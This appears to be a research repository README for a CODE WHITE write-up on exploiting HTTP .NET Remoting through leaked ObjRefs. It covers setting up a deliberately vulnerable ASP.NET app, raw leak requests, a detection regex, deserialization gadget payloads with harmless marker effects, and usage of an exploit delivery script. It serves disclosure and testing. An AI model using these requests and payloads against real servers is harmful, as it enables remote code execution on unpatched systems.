This repository provides further details and resources on the CODE WHITE blog post of the same name Leaking ObjRefs to Exploit HTTP .NET Remoting:
- Creating a vulnerable ASP.NET web application
- Detecting
ObjRefleaks - Example deserialization payloads that work under the
TypeFilterLevel.Lowrestrictions - Exploit script for delivering the payloads
The following is based on Configure Application Insights for your ASP.NET website by Microsoft and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2, you can still download it at https://aka.ms/vs/16/release/vs_community.exe) and Microsoft Application Insights:
- Open Visual Studio 2019.
- Select File > New > Project.
- Select ASP.NET Web Application (.NET Framework) C#, then Next.
- Select .NET Framework 4.5.2, then Create.
- Select Empty, then Create.
- Select Project > Add Application Insights Telemetry.
- Select Application Insights SDK (local), then Next.
- Check NuGet packages, then click Finish.
If the .NET Framework updates of January 2024 are installed, open the Web.config file and add the following under /configuration/appSettings to re-enable the vulnerable behavior:
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />You can then run the web application via Debug > Start Without Debugging or by pressing Ctrl+F5.
You can use the following requests to leak ObjRefs of MarshalByRefObject instances stored in the LogicalCallContext:
-
BinaryServerFormatterSink:GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0 __RequestVerb: POST Content-Type: application/octet-stream -
SoapServerFormatterSink:GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0 __RequestVerb: POST Content-Type: text/xml
Leaked ObjRef URIs can then be matched using the following regex:
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem
We have created two simple deserialization payloads based on the TextFormattingRunProperties gadget of YSoSerial.Net with custom XAML payloads that work under the restrictions caused by TypeFilterLevel.Low to perform the following:
HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"
The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.
The RemoteApplicationMetadata.py script provides a way for leaking existing ObjRef and then using it in a subsequent request to deliver a given payload:
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]
positional arguments:
url target URL (without `RemoteApplicationMetadata.rem`)
file BinaryFormatter/SoapFormatter payload file (default: stdin)
options:
-h, --help show this help message and exit
-c, --chunked use chunked Transfer-Encoding for request
--chunk-range CHUNK_RANGE
range to pick the chunk size from randomly, e. g., 1-10
-e, --encoding apply a random non ASCII-based encoding on SOAP
-f {binary,soap}, --format {binary,soap}
targeted runtime serializer format (default: soap)
-u, --use-generic-uri
use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
-v, --verbose print verbose info
Example:
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v